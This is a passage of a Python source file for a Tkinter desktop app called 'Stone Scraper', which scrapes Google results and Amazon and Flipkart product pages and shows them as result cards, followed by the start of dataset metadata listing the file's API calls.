super().getSoup(shoppingAmazonSearchURL,40)\n\t\tsuper().progress(50)\n\t\tself.scrapeShoppingAmazonData = {'name':\"-\",'initialprice':\"-\",'discount':\"-\",'finalprice':\"-\",'rating':\"-\",'reviewphrase':\"-\",'review':\"-\",'imageurl':\"\",'searchurl':shoppingAmazonSearchURL}\n\n\t\twith open(\"amz(results).html\",\"w\",encoding=\"utf-8\") as file:\n\t\t\tfile.write(soupShoppingAmazon.prettify())\n\n\t\tshoppingAmazonResult = soupShoppingAmazon.select(\".a-link-normal.a-text-normal\")\n\t\tif shoppingAmazonResult == []:\n\t\t\tself.scrapeShoppingAmazonData[\"name\"] = \"No product found :(\"\n\t\t\tprint(\"1st return\",self.scrapeShoppingAmazonData)\t\n\t\t\treturn 0\n\n\t\telse:\n\t\t\tfor anchor in shoppingAmazonResult:\n\t\t\t\tanchorHref = anchor.attrs[\"href\"]\n\t\t\t\tif \"ssoredirect\" not in anchorHref:\n\t\t\t\t\tanchorHref = anchorHref.replace(\"%3D\",\"=\")\n\t\t\t\t\tanchorHref = anchorHref.replace(\"%26\",\"&\")\n\t\t\t\t\tanchorHref = anchorHref.replace(\"%3\"+\"F\",\"?\")\n\t\t\t\t\tshoppingAmazonSearchURL = f\"http://www.amazon.in/{anchorHref}\"\n\t\t\t\t\tbreak\n\n\t\t\tif \"http://www.amazon.in/s/ref=nb_sb_noss_2?url=search-alias%3Daps&field-keywords=\" in shoppingAmazonSearchURL:\n\t\t\t\tself.scrapeShoppingAmazonData[\"name\"] = \"No product found :(\"\n\t\t\t\tprint(\"2nd return\", self.scrapeShoppingAmazonData)\t\n\t\t\t\treturn 0\n\n\t\t\tsoupShoppingAmazonProduct = super().getSoup(shoppingAmazonSearchURL)\n\t\t\tself.scrapeShoppingAmazonData['searchurl']=shoppingAmazonSearchURL\n\t\t\twith open(\"amz.html\",\"w\",encoding=\"utf-8\") as file:\n\t\t\t\tfile.write(soupShoppingAmazonProduct.prettify())\n\t\t\tself.setScrapeShoppingAmazonData(soupShoppingAmazonProduct)\n\t\t\tself.printResultsShopping(self.scrapeShoppingAmazonData)\n\t\t\treturn 1\n\n\tdef initCardShoppingStyles(self):\n\t\tttk.Style().configure(\"linkShopping.TLabel\",foreground=\"#001b85\",background=\"#00e6b0\")\n\t\tttk.Style().configure(\"linkShoppingActive.TLabel\",foreground=\"#008cff\",background=\"#00e6b0\")\n\t\tttk.Style().configure(\"frameShopping.TFrame\",background=\"#00e6b0\")\n\t\tttk.Style().configure(\"textShopping.TLabel\",background=\"#00e6b0\")\n\t\n\tdef __init__(self,master=None,searchKeys=\"\"):\n\t\tsuper().__init__(master)\n\t\tself.master = master\n\t\tself.searchKeys = searchKeys\n\t\tself.imageSideLength = 280\n\t\tself.cardShoppingFrameElements = {}\n\t\tself.initCardShoppingStyles()\n\t\tif master.master.master.tabMiddlePane.amazonToggleButtonState:\n\t\t\tsuper().progress(10)\n\t\t\tsuccessShoppingAmazon = self.scrapeShoppingAmazon()\n\t\t\tself.resultCardShoppingLoadWidgets(self.scrapeShoppingAmazonData,'amazon',0,successShoppingAmazon)\n\t\tif master.master.master.tabMiddlePane.flipkartToggleButtonState:\n\t\t\tsuper().progress(10)\n\t\t\tsuccessShoppingFlipkart = self.scrapeShoppingFlipkart()\n\t\t\tself.resultCardShoppingLoadWidgets(self.scrapeShoppingFlipkartData,'flipkart',1,successShoppingFlipkart)\n\t\t\n\t\tself.pack(side=\"bottom\",ipadx=0,ipady=5,padx=0,pady=5,expand=1,fill=\"x\")\n\t\tself.config(relief=\"sunken\",style=\"frameShopping.TFrame\")\n\t\tsuper().progress(100)\n\nclass initResultCardGoogle(ttk.Frame,basicProcesses):\n\tdef cardGoogleHoverIn(self,event):\n\t\tself.config(style=\"cardResultFrameActive.TFrame\")\n\t\tself.cardGoogleTitle.config(style=\"titleFrameActive.TLabel\")\n\t\tself.cardGoogleLink.config(style=\"linkFrameActive.TLabel\")\n\t\tself.cardGoogleText.config(style=\"textFrameActive.TLabel\")\n\t\tif self.success:\n\t\t\tself.cardGoogleFooter.config(style=\"linkFrameActive.TLabel\")\n\t\n\tdef cardGoogleHoverOut(self,event):\n\t\tself.config(style=\"cardResultFrame.TFrame\")\n\t\tself.cardGoogleTitle.config(style=\"titleFrame.TLabel\")\n\t\tself.cardGoogleLink.config(style=\"linkFrame.TLabel\")\n\t\tself.cardGoogleText.config(style=\"textFrame.TLabel\")\n\t\tif self.success:\n\t\t\tself.cardGoogleFooter.config(style=\"linkFrame.TLabel\")\n\n\tdef resultCardGoogleLoadWidgets(self):\n\t\tprint(self.scrapeGoogleData)\n\t\tself.cardGoogleTitle = ttk.Label(self,text=self.scrapeGoogleData[\"title\"],justify=\"left\",font=(\"Calibri\",15),wrap=1300,style=\"titleFrame.TLabel\")\n\t\tself.cardGoogleLink = ttk.Label(self,text=self.scrapeGoogleData[\"link\"],justify=\"left\",font=(\"Calibri\",12,'underline'),wrap=1300,style=\"linkFrameActive.TLabel\")\n\t\tself.cardGoogleText = ttk.Label(self,text=self.scrapeGoogleData[\"text\"],justify=\"left\",font=(\"Calibri\",13),wrap=1300,style=\"textFrameActive.TLabel\")\n\t\tself.cardGoogleFooter = ttk.Label(self,text=f\"Google search results for {self.searchKeys}\",justify=\"left\",font=(\"Calibri\",13),wrap=1300,style=\"linkFrameActive.TLabel\")\n\t\t\n\t\tself.cardGoogleTitle.grid(row=0,column=0,sticky='W',padx=20)\n\t\tself.cardGoogleLink.grid(row=1,column=0,sticky='W',padx=20,pady=3)\n\t\tself.cardGoogleText.grid(row=2,column=0,sticky='W',padx=20,pady=3)\n\t\tself.cardGoogleFooter.grid(row=3,column=0,sticky='W',padx=20,pady=3)\n\t\tself.cardGoogleLink.bind(\"\", lambda event : event.widget.config(style=\"linkActive.TLabel\"))\n\t\tself.cardGoogleLink.bind(\"\", lambda event : event.widget.config(style=\"linkFrameActive.TLabel\"))\n\t\tself.cardGoogleLink.bind(\"\", lambda t : super(initResultCardGoogle,self).openWebsite(self.scrapeGoogleData[\"link\"]))\n\t\tself.cardGoogleFooter.bind(\"\", lambda event : event.widget.config(style=\"linkActive.TLabel\"))\n\t\tself.cardGoogleFooter.bind(\"\", lambda event : event.widget.config(style=\"linkFrameActive.TLabel\"))\n\t\tself.cardGoogleFooter.bind(\"\", lambda t : super(initResultCardGoogle,self).openWebsite(self.googleSearchURL))\n\n\tdef initCardGoogleStyles(self):\n\t\tttk.Style().configure(\"cardResultFrame.TFrame\",background=\"#00e6c7\",bordercolor=\"blue\",borderwidth=2)\n\t\tttk.Style().configure(\"cardResultFrameActive.TFrame\",background=\"#00e6b0\",bordercolor=\"blue\",borderwidth=2)\n\n\t\tttk.Style().configure(\"titleFrame.TLabel\",foreground=\"#ffffff\",background=\"#d40000\")\n\t\tttk.Style().configure(\"titleFrameActive.TLabel\",foreground=\"#ffffff\",background=\"#b50000\")\n\t\t\n\t\tttk.Style().configure(\"linkFrame.TLabel\",foreground=\"#001b85\",background=\"#00e6c7\",relief='flat')\n\t\tttk.Style().configure(\"linkFrameActive.TLabel\",foreground=\"#001b85\",background=\"#00e6b0\",relief='flat')\n\t\tttk.Style().configure(\"linkActive.TLabel\",foreground=\"#008cff\",background=\"#00e6b0\",relief='flat')\n\t\t#1fffca\n\t\tttk.Style().configure(\"textFrame.TLabel\",foreground=\"black\",background=\"#00e6c7\")\n\t\tttk.Style().configure(\"textFrameActive.TLabel\",foreground=\"black\",background=\"#00e6b0\")\n\n\tdef scrapeGoogle(self):\n\t\tgoogleSearchKeys = super().optimizeSearchInput(self.searchKeys)\n\t\tself.googleSearchURL = f\"https://www.google.com/search?q={googleSearchKeys}&num=10&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a&channel=fflb\"\n\t\tsuper().progress(20)\n\t\tsoupGoogle = super().getSoup(self.googleSearchURL)\n\t\tsuper().progress(80)\n\t\tself.scrapeGoogleData = {'link':\"-\",'title':\"-\",'text':\"-\"}\n\n\t\ttopResult = soupGoogle.select_one(\".PhiYYd.QBl4oe\")\n\t\tif topResult!=None:\n\t\t\tself.scrapeGoogleData['link'] = topResult.select_one(\"a\").attrs['href']\n\t\t\tself.scrapeGoogleData['title'] = topResult.select_one(\"h3\").text\n\t\t\tself.scrapeGoogleData['text'] = \"Preview Image\"\n\t\telse:\n\t\t\ttopResult = soupGoogle.select_one(\".rc\")\n\t\t\tif topResult!=None:\n\t\t\t\tself.scrapeGoogleData['link'] = topResult.select_one(\"a\").attrs['href']\n\t\t\t\tself.scrapeGoogleData['title'] = topResult.select_one(\"h3\").text\n\t\t\t\tself.scrapeGoogleData['text'] = topResult.select_one(\".s\").text\n\t\t\t\tif self.scrapeGoogleData['text']==\"\":\n\t\t\t\t\tself.scrapeGoogleData['text'] = topResult.parent.previous_sibling.text\n\t\t\telse:\n\t\t\t\tself.scrapeGoogleData['title'] = \"Sorry! No results found :(\"\n\t\t\t\tself.scrapeGoogleData['link'] = self.googleSearchURL\n\t\t\t\tself.scrapeGoogleData['text'] = f\"You searched for - {self.searchKeys}\"\n\t\t\t\treturn 0\n\t\treturn 1\n\n\t\tprint(self.scrapeGoogleData)\n\n\tdef __init__(self,master=None,searchKeys=\"\"):\n\t\tsuper().__init__(master)\n\t\tself.master = master\n\t\tself.searchKeys = searchKeys\n\t\tsuper().progress(10)\n\t\tself.success = self.scrapeGoogle()\n\t\tself.initCardGoogleStyles()\n\t\tself.resultCardGoogleLoadWidgets()\n\t\tsuper().progress(90)\n\t\tself.pack(side=\"bottom\",ipadx=0,ipady=5,padx=0,pady=5,expand=1,fill=\"x\")\n\t\tself.config(relief=\"sunken\",style=\"cardResultFrameActive.TFrame\")\n\t\tself.bind(\"\", self.cardGoogleHoverIn)\n\t\tself.bind(\"\", self.cardGoogleHoverOut)\n\t\tself.bind(\"\", lambda event : super(initResultCardGoogle,self).openWebsite(self.scrapeGoogleData[\"link\"]))\n\t\tsuper().progress(100)\n\nclass initTabLowerOutput(ttk.Frame):\n\tdef removeResultCard(self):\n\t\tif self.tabResultCardNumber > self.master.master.cardNumberMax:\n\t\t\tself.tabResultCards[self.tabResultCardNumber-self.master.master.cardNumberMax-1].destroy()\n\n\tdef createResultCard(self,cardType,searchKeys):\n\t\tself.tabResultCards[self.tabResultCardNumber] = cardType(self,searchKeys)\n\t\tself.tabResultCardNumber+=1\n\t\tself.removeResultCard()\n\n\tdef lowerOutputLoadWidgets(self):\n\t\tself.tabResultsPlaceholder = ttk.Label(self,text=\"\",font=(\"Calibri\",10),justify=\"center\",width=200)\n\t\tself.tabResultsPlaceholder.pack(side=\"bottom\",ipadx=0,ipady=0,padx=0,pady=0)\n\t\tself.tabResultCardNumber = 0\n\t\tself.tabResultCards = {}\n\n\tdef __init__(self,master=None):\n\t\tsuper().__init__(master)\n\t\tself.master = master\n\t\tself.grid(row=0,column=1,sticky=\"N\",ipadx=0,ipady=0,padx=15,pady=0)\n\t\t# self.lowerOutputStyle = ttk.Style()\n\t\t# self.lowerOutputStyle.configure(\"Output.TFrame\",background=\"blue\")\n\t\t# self.config(style=\"Output.TFrame\")\n\t\tself.lowerOutputLoadWidgets()\n\nclass initTabLowerPane(ttk.Frame):\n\tdef lowerPaneLoadWidgets(self):\n\t\tself.tabLowerProgress = ttk.Progressbar(self,length=540,value=0,orient=\"vertical\")\n\t\tself.tabLowerProgress.grid(row=0,column=0,ipadx=1,ipady=0,padx=0,pady=0)\n\t\tself.tabLowerOutput = initTabLowerOutput(self)\n\t\n\tdef __init__(self,master=None):\n\t\tsuper().__init__(master)\n\t\tself.master = master\n\t\tself.pack(side=\"top\",ipadx=0,ipady=0,padx=0,pady=0)\n\t\t# self.lowerPaneStyle = ttk.Style()\n\t\t# self.lowerPaneStyle.configure(\"Lower.TFrame\",background=\"red\")\n\t\t# self.config(style=\"Lower.TFrame\")\n\t\tself.lowerPaneLoadWidgets()\n\nclass initTabMiddlePane (ttk.Frame):\n\tdef amazonToggle(self,event):\n\t\tself.amazonToggleButtonState = not self.amazonToggleButtonState\n\t\tif self.amazonToggleButtonState:\n\t\t\tself.amazonToggleButton.config(image=self.amazonEnabled)\n\t\telse:\n\t\t\tself.amazonToggleButton.config(image=self.amazonDisabled)\n\t\tif (not self.amazonToggleButtonState and not self.flipkartToggleButtonState):\n\t\t\tself.flipkartToggle(\"Toggle\")\n\n\tdef flipkartToggle(self,event):\n\t\tself.flipkartToggleButtonState = not self.flipkartToggleButtonState\n\t\tif self.flipkartToggleButtonState:\n\t\t\tself.flipkartToggleButton.config(image=self.flipkartEnabled)\n\t\telse:\n\t\t\tself.flipkartToggleButton.config(image=self.flipkartDisabled)\n\t\tif (not self.flipkartToggleButtonState and not self.amazonToggleButtonState):\n\t\t\tself.amazonToggle(\"Toggle\")\n\n\tdef middlePaneLoadWidgets(self,tabName):\n\t\tif tabName == \"Google Search\":\n\t\t\tself.middlePaneTagImage = ImageTk.PhotoImage(Image.open(\"images/google-middle-pane-600x50.png\"))\n\t\t\tself.middlePaneTagLabel = ttk.Label(self,image=self.middlePaneTagImage)\n\t\t\tself.middlePaneTagLabel.pack(side=\"top\",ipadx=0,ipady=0,padx=0,pady=0)\n\t\telif tabName == \"Online Shopping\":\n\t\t\tself.amazonEnabled = ImageTk.PhotoImage(Image.open(\"images/amazon-enabled.png\"))\n\t\t\tself.amazonDisabled = ImageTk.PhotoImage(Image.open(\"images/amazon-disabled.png\"))\n\t\t\tself.flipkartEnabled = ImageTk.PhotoImage(Image.open(\"images/flipkart-enabled.png\"))\n\t\t\tself.flipkartDisabled = ImageTk.PhotoImage(Image.open(\"images/flipkart-disabled.png\"))\n\n\t\t\tself.amazonToggleButtonState = True\n\t\t\tself.flipkartToggleButtonState = True\n\t\t\tself.amazonToggleButton = ttk.Label(self,image=self.amazonEnabled,style=\"TLabel\")\n\t\t\tself.flipkartToggleButton = ttk.Label(self,image=self.flipkartEnabled,style=\"TLabel\")\n\n\t\t\tself.amazonToggleButton.bind(\"\",self.amazonToggle)\n\t\t\tself.flipkartToggleButton.bind(\"\",self.flipkartToggle)\n\n\t\t\tself.amazonToggleButton.pack(side='left')\n\t\t\tself.flipkartToggleButton.pack(side='left')\n\t\t\n\tdef __init__(self,master=None,tabName=\"Tab\"):\n\t\tsuper().__init__(master)\n\t\tself.master = master\n\t\tself.pack(side=\"top\",ipadx=0,ipady=0,padx=0,pady=10)\n\t\tself.middlePaneLoadWidgets(tabName)\n\nclass initTabInputPane(ttk.Frame):\n\tdef clearInputFieldFirst(self,event):\n\t\tif self.clearInputField :\n\t\t\tself.tabInputField.delete(0,'end')\n\t\t\tself.clearInputField = 0\n\n\tdef inputPaneLoadWidgets(self):\n\n\t\tself.entryStyle = ttk.Style()\n\t\tself.entryStyle.map(\"Custom.TEntry\",foreground=[('!focus', 'grey')])\n\t\tself.tabInputField = ttk.Entry(self,width=80,font=(\"Calibri\",15),style=\"Custom.TEntry\")\n\t\tself.tabInputField.insert(0,\"Enter your search term here\")\n\t\tself.tabSearchIconImage = ImageTk.PhotoImage(Image.open(\"images/search-icon-image-disabled-80x80.png\"))\n\t\tself.tabSearchIcon = ttk.Button(self,image=self.tabSearchIconImage,style=\"searchIcon.TLabel\",command=lambda:self.master.processInput(\"SearchButton\"))\n\n\t\tself.clearInputField = 1\n\t\tself.tabInputField.pack(side=\"left\",padx=40,pady=0,ipadx=0,ipady=8)\n\t\tself.tabInputField.bind(\"\",self.clearInputFieldFirst)\n\t\tself.tabInputField.bind(\"\",self.master.processInput)\n\t\tself.tabSearchIcon.pack(side=\"left\",padx=40,pady=0,ipadx=0,ipady=10)\n\n\tdef __init__(self,master=None):\n\t\tsuper().__init__(master)\n\t\tself.master = master\n\t\tself.pack(side=\"top\",ipadx=0,ipady=0,padx=10,pady=0)\n\t\tself.inputPaneLoadWidgets()\n\nclass initRootNbTab (ttk.Frame):\n\tdef processInput(self,event):\n\t\tif self.processingInput:\n\t\t\treturn\n\t\tself.processingInput = True\n\t\tself.tabInputPane.tabInputField.config(state='disabled')\n\t\tself.tabInputPane.tabSearchIcon.config(state='disabled')\n\t\tself.tabLowerPane.tabLowerProgress.update_idletasks()\n\n\t\tif self.tabName == \"Google Search\":\n\t\t\tself.tabLowerPane.tabLowerOutput.createResultCard(initResultCardGoogle,self.tabInputPane.tabInputField.get())\n\t\telif self.tabName == \"Online Shopping\":\n\t\t\tself.tabLowerPane.tabLowerOutput.createResultCard(initResultCardShopping,self.tabInputPane.tabInputField.get())\n\n\t\tself.tabInputPane.tabInputField.config(state='normal')\n\t\tself.tabInputPane.tabSearchIcon.config(state='normal')\n\t\tself.tabInputPane.update_idletasks()\n\t\tself.processingInput = False\n\n\tdef tabLoadWidgets(self):\n\t\tself.tabImage = ImageTk.PhotoImage(Image.open(f\"images/{self.tabName.replace(' ','-')}-tab-image-1200x220.png\"))\n\t\tself.tabImageLabel = ttk.Label(self,image=self.tabImage)\n\t\tself.tabImageLabel.pack(side=\"top\",ipadx=0,ipady=0,padx=0,pady=0)\n\t\tself.searchKeys = None\n\t\tself.tabInputPane = initTabInputPane(self)\n\t\tself.tabMiddlePane = initTabMiddlePane(self,self.tabName)\n\t\tself.tabLowerPane = initTabLowerPane(self)\n\t\tself.processingInput = False\n\n\tdef __init__(self,master=None,tabName=\"Tab\",cardNumberMax=1):\n\t\tsuper().__init__()\n\t\tself.master = master\n\t\tself.master.add(self,text=tabName)\n\t\tself.tabName = tabName\n\t\tself.cardNumberMax = cardNumberMax\n\t\tself.tabLoadWidgets()\n\nclass initRootNotebook(ttk.Notebook):\n\tdef notebookLoadWidgets(self):\n\t\tself.rootTabGoogle = initRootNbTab(self,\"Google Search\",3)\n\t\tself.rootTabShopping = initRootNbTab(self,\"Online Shopping\")\n\n\tdef __init__(self,master):\n\t\tsuper().__init__()\n\t\tself.master = master\n\t\tself.pack(expand=1,fill=\"both\")\n\t\tself.enable_traversal()\n\t\tself.notebookLoadWidgets()\n\nclass initRootMenu(tk.Menu,basicProcesses):\n\tdef winResize(self,winDim):\n\t\tself.master.winWidth = winDim.split(\"x\")[0]\n\t\tself.master.geometry(winDim)\n\n\tdef menuLoadWidgets(self):\n\t\tself.master.config(menu=self)\n\n\t\tself.rootMenuFile = tk.Menu(self.master,tearoff=0)\n\t\tself.add_cascade(label=\"File\",menu=self.rootMenuFile)\n\t\tself.rootMenuFile.add_command(label=\"Exit\\t\\t\\t\\t\\t(Alt+F4)\",command=self.master.destroy)\n\t\tself.rootMenuFile.add_command(label=\"Contact\",command=lambda : super(initRootMenu,self).openWebsite(\"http://psaurav1290.github.io\"))\n\n\t\tself.rootMenuResize = tk.Menu(self.master,tearoff=0)\n\t\tself.add_cascade(label=\"Resize\",menu=self.rootMenuResize)\n\t\tself.rootMenuResize.add_command(label=\"Wide\",command=lambda:self.winResize(\"1500x1010\"))\n\t\tself.rootMenuResize.add_command(label=\"Narrow\",command=lambda:self.winResize(\"800x1010\"))\n\n\tdef __init__(self,master=None):\n\t\tsuper().__init__()\n\t\tself.master = master\n\t\tself.menuLoadWidgets()\n\nclass initRoot(themed_tk.ThemedTk):\n\tdef rootLoadWidgets(self):\n\t\tself.rootMenu = initRootMenu(self)\n\t\tself.rootNotebook = initRootNotebook(self)\n\t\n\tdef __init__(self):\n\t\tctypes.windll.shcore.SetProcessDpiAwareness(1)\n\t\tsuper().__init__()\n\t\tself.set_theme(\"plastik\")\n\t\tself.geometry(\"1500x1030+100+0\")\n\t\tself.title(\"Stone Scraper\")\n\t\tself.iconbitmap(\"favicon.ico\")\n\t\tself.winWidth = 1500\n\t\tself.rootLoadWidgets()\n\nif __name__ == \"__main__\":\n\n\troot = initRoot()\n\troot.mainloop()", "repo_name": "psaurav1290/stonescraper", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 30473, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urllib.parse.quote", "line_number": 24, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 24, "usage_type": "attribute"}, {"api_name": "webbrowser.open_new", "line_number": 27, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 31, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 33, "usage_type": "call"}, {"api_name": "tkinter.ttk.Frame", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tkinter.ttk", "line_number": 42, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 46, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 46, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 47, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 47, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 48, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 48, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 49, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 49, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 51, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 51, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 53, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 53, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 55, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 55, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 57, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 57, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 58, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 58, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 60, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 60, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 62, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 62, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 62, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 62, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 63, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 63, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 81, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 81, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 81, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 81, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 83, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 83, "usage_type": "name"}, {"api_name": "urllib.request.urlopen", "line_number": 85, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 86, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 86, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 96, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 96, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 97, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 97, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 98, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 98, "usage_type": "name"}, {"api_name": "re.split", "line_number": 110, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 115, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 138, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 139, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 181, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 204, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 205, "usage_type": "call"}, {"api_name": "tkinter.ttk.Style", "line_number": 251, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 251, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 252, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 252, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 253, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 253, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 254, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 254, "usage_type": "name"}, {"api_name": "tkinter.ttk.Frame", "line_number": 276, "usage_type": "attribute"}, {"api_name": "tkinter.ttk", "line_number": 276, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 295, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 295, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 296, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 296, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 297, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 297, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 298, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 298, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 312, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 312, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 313, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 313, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 315, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 315, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 316, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 316, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 318, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 318, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 319, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 319, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 320, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 320, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 322, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 322, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 323, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 323, "usage_type": "name"}, {"api_name": "tkinter.ttk.Frame", "line_number": 371, "usage_type": "attribute"}, {"api_name": "tkinter.ttk", "line_number": 371, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 382, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 382, "usage_type": "name"}, {"api_name": "tkinter.ttk.Frame", "line_number": 396, "usage_type": "attribute"}, {"api_name": "tkinter.ttk", "line_number": 396, "usage_type": "name"}, {"api_name": "tkinter.ttk.Progressbar", "line_number": 398, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 398, "usage_type": "name"}, {"api_name": "tkinter.ttk.Frame", "line_number": 411, "usage_type": "attribute"}, {"api_name": "tkinter.ttk", "line_number": 411, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 432, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 432, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 432, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 432, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 433, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 433, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 436, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 436, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 436, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 436, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 437, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 437, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 437, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 437, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 438, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 438, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 438, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 438, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 439, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 439, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 439, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 439, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 443, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 443, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 444, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 444, "usage_type": "name"}, {"api_name": "tkinter.ttk.Frame", "line_number": 458, "usage_type": "attribute"}, {"api_name": "tkinter.ttk", "line_number": 458, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 466, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 466, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 468, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 468, "usage_type": "name"}, {"api_name": 